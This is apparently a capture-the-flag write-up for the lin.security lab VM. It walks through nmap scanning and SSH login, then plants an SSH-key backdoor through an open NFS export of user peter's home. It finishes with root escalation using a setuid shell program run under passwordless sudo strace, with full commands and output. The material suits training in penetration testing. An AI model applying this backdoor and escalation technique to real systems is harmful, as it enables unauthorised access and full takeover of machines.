BACK
_ _ _____ _ _ __
| | (_) / ___| (_) | / |
| | _ _ __ \ `--. ___ ___ _ _ _ __ _| |_ _ _`| |
| | | | '_ \ `--. \/ _ \/ __| | | | '__| | __| | | || |
| |___| | | | |_/\__/ / __/ (__| |_| | | | | |_| |_| || |_
\_____/_|_| |_(_)____/ \___|\___|\__,_|_| |_|\__|\__, \___/
__/ |
|___/
TARGET IP: 10.0.2.11
by sc00by
Given credentials:
user: bob
pass: secret
#####
nmap:
#####
root@kali:~/Documents/LinSecurity1#
nmap -sV -p- -vvv -n -sS 10.0.2.11
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-18 19:42 EDT
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 19:42
Scanning 10.0.2.11 [1 port]
Completed ARP Ping Scan at 19:42, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:42
Scanning 10.0.2.11 [65535 ports]
Discovered open port 22/tcp on 10.0.2.11
Discovered open port 111/tcp on 10.0.2.11
Discovered open port 42799/tcp on 10.0.2.11
Discovered open port 35245/tcp on 10.0.2.11
Discovered open port 56929/tcp on 10.0.2.11
Discovered open port 43193/tcp on 10.0.2.11
Discovered open port 2049/tcp on 10.0.2.11
Completed SYN Stealth Scan at 19:42, 3.48s elapsed (65535 total ports)
Initiating Service scan at 19:42
Scanning 7 services on 10.0.2.11
Completed Service scan at 19:42, 6.03s elapsed (7 services on 1 host)
NSE: Script scanning 10.0.2.11.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:42
Completed NSE at 19:42, 0.05s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:42
Completed NSE at 19:42, 0.06s elapsed
Nmap scan report for 10.0.2.11
Host is up, received arp-response (0.00013s latency).
Scanned at 2018-09-18 19:42:24 EDT for 10s
Not shown: 65528 closed ports
Reason: 65528 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
2049/tcp open nfs_acl syn-ack ttl 64 3 (RPC #100227)
35245/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
42799/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
43193/tcp open nlockmgr syn-ack ttl 64 1-4 (RPC #100021)
56929/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...
###########################
SSH into given credentials:
###########################
root@kali:~/Documents/LinSecurity1#
ssh bob@10.0.2.11
The authenticity of host '10.0.2.11 (10.0.2.11)' can't be established.
ECDSA key fingerprint is SHA256:I+wq8xJMlaf4EveLeaB70dPi9oP2lx9jUOcJ2Cx9ngQ.
Are you sure you want to continue connecting (yes/no)?
yes
Warning: Permanently added '10.0.2.11' (ECDSA) to the list of known hosts.
bob@10.0.2.11's password:
Welcome to lin.security | https://in.security | version 1.0
bob@linsecurity:~$
[~!~] Easy user ssh access to the box via given credentials!
#####################
Check for suid files:
#####################
bob@linsecurity:~$
find / -perm -u=s -type f 2>/dev/null
...
/bin/ping
/bin/fusermount
/bin/umount
/bin/ntfs-3g
/bin/su
/bin/mount
/usr/bin/pkexec
/usr/bin/netkit-rlogin
/usr/bin/xxd
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/netkit-rcp
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/netkit-rsh
/usr/bin/taskset
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/sbin/mount.nfs
#################################
Check for common vulnerabilities:
#################################
bob@linsecurity:~$
./les.sh
Available information:
Kernel version: 4.15.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 18.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
...
[+] [CVE-2009-1185] udev 2
Details: https://www.exploit-db.com/exploits/8478/
Download URL: https://www.exploit-db.com/download/8478
Comments: SSH access to non privileged user is needed. Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed
[~!~] Unfortunately this exploit led to nothing for us :[
... but there s always another way
#####################
Identify a new angle:
#####################
[~!~] Recall earlier:
111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
2049/tcp open nfs_acl syn-ack ttl 64 3 (RPC #100227)
###########################
Check RPC services running:
###########################
bob@linsecurity:~/machinum/machinum$
rpcinfo -p 10.0.2.11
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100005 1 udp 44424 mountd
100005 1 tcp 56929 mountd
100005 2 udp 54096 mountd
100005 2 tcp 35245 mountd
100005 3 udp 55081 mountd
100005 3 tcp 42799 mountd
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 3 tcp 2049
100003 3 udp 2049 nfs
100227 3 udp 2049
100021 1 udp 44078 nlockmgr
100021 3 udp 44078 nlockmgr
100021 4 udp 44078 nlockmgr
100021 1 tcp 43193 nlockmgr
100021 3 tcp 43193 nlockmgr
100021 4 tcp 43193 nlockmgr
##################################
Setting up NFS on my kali machine:
##################################
root@kali:~/Documents/LinSecurity1#
showmount -e 10.0.2.11
Export list for 10.0.2.11:
/home/peter *
root@kali:~/Documents/LinSecurity1#
mkdir -p /nfs/general
root@kali:~/Documents/LinSecurity1#
mkdir -p /nfs/home
root@kali:~/Documents/LinSecurity1#
mkdir -p /nfs/linsec/peter
root@kali:/nfs/linsec/peter#
ls
root@kali:/nfs/linsec/peter#
ls -la
total 32
drwxr-xr-x 5 bob 1005 4096 Jul 10 15:49 .
drwxr-xr-x 3 root root 4096 Sep 18 21:00 ..
-rw-r--r-- 1 bob 1005 220 Jul 9 15:53 .bash_logout
-rw-r--r-- 1 bob 1005 3771 Jul 9 15:53 .bashrc
drwx------ 2 bob 1005 4096 Jul 10 06:04 .cache
-rw-rw-r-- 1 bob 1005 0 Jul 10 06:04 .cloud-locale-test.skip
drwx------ 3 bob 1005 4096 Jul 10 06:04 .gnupg
drwxrwxr-x 3 bob 1005 4096 Jul 10 04:03 .local
-rw-r--r-- 1 bob 1005 807 Jul 9 15:53 .profile
root@kali:/nfs/linsec/peter#
[~!~] Now we have the NFS filesystem on our Kali machine
we should try and implement some sort of backdoor.
To do this we should mimic the uid of peter from
the target machine. We found this using machinum
earlier on:
uid=1001(peter)
bob@kali:~$
id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
[~!~] Oddly enough, I had a user named 'bob' that had 'uid=1001'
from a lab we did in Computer Security. Perhaps even
MORE oddly enough, he was able to access /nfs/linsec/peter
with no restrictions, whereas root@kali did not have r/w
access to the file system.
#######################################
Crafting a backdoor to peter's account:
#######################################
[~!~] When you have access to a user's file-system, but not an
SSH route, the first thing you would think of doing would
be to create an SSH Key to form a handshake with the server
for persistance.
bob@kali:/nfs/linsec/peter$
ls -la
total 36
drwxr-xr-x 6 bob 1005 4096 Sep 18 21:20 .
drwxr-xr-x 3 root root 4096 Sep 18 21:00 ..
-rw-r--r-- 1 bob 1005 220 Jul 9 15:53 .bash_logout
-rw-r--r-- 1 bob 1005 3771 Jul 9 15:53 .bashrc
drwx------ 2 bob 1005 4096 Jul 10 06:04 .cache
-rw-rw-r-- 1 bob 1005 0 Jul 10 06:04 .cloud-locale-test.skip
drwx------ 3 bob 1005 4096 Jul 10 06:04 .gnupg
drwxrwxr-x 3 bob 1005 4096 Jul 10 04:03 .local
-rw-r--r-- 1 bob 1005 807 Jul 9 15:53 .profile
drwxr-xr-x 2 bob bob 4096 Sep 18 21:20 .ssh
bob@kali:/nfs/linsec/peter/.ssh$
ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/bob/.ssh/id_rsa): /nfs/linsec/peter/.ssh/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /nfs/linsec/peter/.ssh/id_rsa.
Your public key has been saved in /nfs/linsec/peter/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:g3v5UAMdt6t5QiotSF4Xc2WMp3Rw1Ag3Rri/fF7lHDo bob@kali
The key's randomart image is:
+---[RSA 2048]----+
| +O@o |
| .+O=o. |
| +.o=. |
| . =o . |
| . o S +.. ..|
| o o + * +. .oo|
| o + * +..E +|
| + o oo o. |
| . o. |
+----[SHA256]-----+
[~!~] SO NOW, in theory I have a way to get into peter's account
on the target machine, which will give me his permissions
to the whole machine's file system, not just the NFS.
bob@kali:/nfs/linsec/peter/.ssh$
cat id_rsa.pub > authorized_keys
bob@kali:/nfs/linsec/peter/.ssh$
ls
authorized_keys id_rsa id_rsa.pub
#########################
SSH into peter's account:
#########################
bob@kali:/nfs/linsec/peter/.ssh$
ssh -i id_rsa peter@10.0.2.11
Enter passphrase for key 'id_rsa':
Welcome to lin.security | https://in.security | version 1.0
peter@linsecurity:~$
######################
Priveledge Escalation:
######################
[~!~] This took a lot of time to eventually learn of a new
important way for me to enumerate system files that
I can execute as sudo without a password.
From `man sudo`:
-l, --list If no command is specified, list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the
current host. A longer list format is used if this option is specified multiple times and the security policy supports a verbose output
format.
If a command is specified and is permitted by the security policy, the fully-qualified path to the command is displayed along with any com‐
mand line arguments. If command is specified but not allowed, sudo will exit with a status value of 1.
peter@linsecurity:~$
sudo -l
Matching Defaults entries for peter on linsecurity:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User peter may run the following commands on linsecurity:
(ALL) NOPASSWD: /usr/bin/strace
[~!~] `strace` is executable at sudo level without
sudo password!!!
From `man strace`:
NAME
strace - trace system calls and signals
This means we should be able to run a program
at sudo level using `strace`.
#####################
Preparing an exploit:
#####################
gimmeroot.c:
------------------------------------------------------
#include‹stdlib.h›
#include‹unistd.h›
int main()
{
//Set our id values to root
setuid(0);
setgid(0);
//Spawn a shell with our new privs
system("/bin/bash");
}
------------------------------------------------------
peter@linsecurity:~$
gcc gimmeroot.c
peter@linsecurity:~$
sudo strace ./a.out
execve("./a.out", ["./a.out"], 0x7fff74b580f0 /* 14 vars */) = 0
brk(NULL) = 0x5653000b4000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=26254, ...}) = 0
mmap(NULL, 26254, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fb8137ee000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb8137ec000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fb8131dd000
mprotect(0x7fb8133c4000, 2097152, PROT_NONE) = 0
mmap(0x7fb8135c4000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7fb8135c4000
mmap(0x7fb8135ca000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fb8135ca000
close(3) = 0
arch_prctl(ARCH_SET_FS, 0x7fb8137ed4c0) = 0
mprotect(0x7fb8135c4000, 16384, PROT_READ) = 0
mprotect(0x5652ff92b000, 4096, PROT_READ) = 0
mprotect(0x7fb8137f5000, 4096, PROT_READ) = 0
munmap(0x7fb8137ee000, 26254) = 0
setuid(0) = 0
setgid(0) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fb81321bf20}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fb81321bf20}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
clone(child_stack=NULL, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0x7fff2f8b669c) = 19029
wait4(19029,
root@linsecurity:~#
sc00by was here
[~!~] WE GOT A ROOT SHELL!!! That's a win for us!
Thanks for reading!
BACK